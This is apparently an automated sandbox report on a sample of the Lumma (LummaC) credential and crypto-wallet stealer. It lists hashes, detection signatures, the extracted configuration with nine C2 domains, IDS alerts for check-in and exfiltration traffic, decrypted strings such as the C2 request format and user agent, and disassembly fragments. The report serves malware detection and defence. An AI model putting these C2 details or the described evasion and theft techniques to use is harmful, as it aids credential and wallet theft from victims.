Edit tour

Windows Analysis Report
UmotQ1qjLq.exe

Overview

General Information

Sample name:	UmotQ1qjLq.exe renamed because original name is a hash value
Original sample name:	0c317f381e79d53cf9cdfce0497448c0.exe
Analysis ID:	1582424
MD5:	0c317f381e79d53cf9cdfce0497448c0
SHA1:	17540fe62c058e8416510a7be74019d13dc6be87
SHA256:	e3e467f3cbb8bc4f9d3f36a7a07f508ee6d9f8e73393882a30d42a5be983cb60
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to query CPU information (cpuid)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

UmotQ1qjLq.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\UmotQ1qjLq.exe" MD5: 0C317F381E79D53CF9CDFCE0497448C0)

chrome.exe (PID: 796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,1303582193937569043,18141116409944036505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1920,i,10785265456503200477,11409985625348319753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fancywaxxers.shop", "tirepublicerj.shop", "abruptyopsn.shop", "framekgirus.shop", "cloudewahsj.shop", "wholersorie.shop", "noisycuttej.shop", "nearycrepso.shop", "rabidcowse.shop"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1953190112.0000000001672000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2017085147.0000000001672000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1950540598.0000000001671000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UmotQ1qjLq.exe PID: 6256	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: UmotQ1qjLq.exe PID: 6256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UmotQ1qjLq.exe PID: 6256	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: UmotQ1qjLq.exe PID: 6256	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T15:52:59.535100+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-30T15:53:20.299626+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.96.1	443	TCP
2024-12-30T15:53:21.692773+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.96.1	443	TCP
2024-12-30T15:53:23.362663+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.96.1	443	TCP
2024-12-30T15:53:24.665716+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.96.1	443	TCP
2024-12-30T15:53:26.726635+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.96.1	443	TCP
2024-12-30T15:53:28.169921+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.96.1	443	TCP
2024-12-30T15:53:33.072309+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T15:53:19.630512+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-30T15:53:20.760969+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.96.1	443	TCP
2024-12-30T15:53:33.553880+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49743	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T15:53:19.630512+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T15:53:20.760969+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49737	104.21.96.1	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T15:53:34.267439+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49744	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T15:53:23.942349+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.96.1	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T15:53:28.204478+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49742	104.21.96.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UmotQ1qjLq.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/ode	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiV	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/api	Avira URL Cloud: Label: malware
Source: wholersorie.shop	Avira URL Cloud: Label: malware
Source: cloudewahsj.shop	Avira URL Cloud: Label: malware
Source: rabidcowse.shop	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/g	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apite	Avira URL Cloud: Label: malware
Source: fancywaxxers.shop	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/c	Avira URL Cloud: Label: malware
Source: noisycuttej.shop	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/5	Avira URL Cloud: Label: malware
Source: nearycrepso.shop	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/	Avira URL Cloud: Label: malware
Source: framekgirus.shop	Avira URL Cloud: Label: malware
Source: tirepublicerj.shop	Avira URL Cloud: Label: malware
Source: abruptyopsn.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: UmotQ1qjLq.exe.6256.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["fancywaxxers.shop", "tirepublicerj.shop", "abruptyopsn.shop", "framekgirus.shop", "cloudewahsj.shop", "wholersorie.shop", "noisycuttej.shop", "nearycrepso.shop", "rabidcowse.shop"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: UmotQ1qjLq.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: UmotQ1qjLq.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1679651088.0000000005140000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Code function: 0_2_00B29362 CryptUnprotectData,

0_2_00B29362

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: UmotQ1qjLq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49743 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: UmotQ1qjLq.exe, 00000000.00000002.2163497130.0000000006A32000.00000040.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]	0_2_00B36000
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then jmp ecx	0_2_00B329CD
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B329CD
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B33120
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]	0_2_00B1C22D
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	0_2_00B4FB80
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [eax], dl	0_2_00B3238D
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then jmp ecx	0_2_00B3238D
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov dword ptr [esp], ecx	0_2_00B29362
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	0_2_00B50480
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]	0_2_00B4DCE9
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00B4DCE9
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00B3BE8A
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_00B3BE8A
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov esi, edx	0_2_00B18640
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [esi], dl	0_2_00B1DE48
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h	0_2_00B498A0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh	0_2_00B490A0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	0_2_00B25882
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	0_2_00B25882
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_00B3C0CD
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h	0_2_00B29820
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00B29820
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then jmp ecx	0_2_00B4D818
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_00B3A050
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]	0_2_00B4E850
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]	0_2_00B4E051
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]	0_2_00B36360
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B36360
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]	0_2_00B4C1B0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_00B3C1A3
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00B4E19A
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B1B9F1
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	0_2_00B50130
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B38100
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx esi, word ptr [eax]	0_2_00B34974
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_00B34974
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_00B3895A
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov ecx, eax	0_2_00B3895A
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_00B3C140
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh	0_2_00B26148
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]	0_2_00B26148
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00B26148
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00B26148
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00B39A90
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00B3C282
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_00B3C282
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]	0_2_00B4EA80
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00B3BA79
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_00B2CA60
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_00B2CA60
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]	0_2_00B33A60
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]	0_2_00B4E262
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00B3C26C
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_00B3C26C
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then push esi	0_2_00B30BD3
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then test eax, eax	0_2_00B493D0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]	0_2_00B173C0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	0_2_00B173C0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_00B4F3C0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]	0_2_00B2C3CC
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00B12B60
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]	0_2_00B36360
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B36360
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B36340
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]	0_2_00B36340
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]	0_2_00B37CB0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B37CB0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_00B374A5
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	0_2_00B26C90
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	0_2_00B31C80
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00B45410
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]	0_2_00B49C70
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_00B4F450
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov edx, eax	0_2_00B4C440
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov ecx, eax	0_2_00B2AD80
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	0_2_00B26C90
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	0_2_00B255DB
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]	0_2_00B24DC0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov esi, ecx	0_2_00B4C510
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then test eax, eax	0_2_00B4C510
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h	0_2_00B4C510
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov edi, eax	0_2_00B2BD6D
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	0_2_00B2DE90
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]	0_2_00B1C6F0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00B18EF0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx]	0_2_00B4E6E0
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_00B2CECA
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h	0_2_00B4FE20
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	0_2_00B4DFB3
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	0_2_00B34F91
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_00B34F91
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00B26F8D
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov edx, ecx	0_2_00B26F8D
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_00B26F8D
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]	0_2_00B27FE1
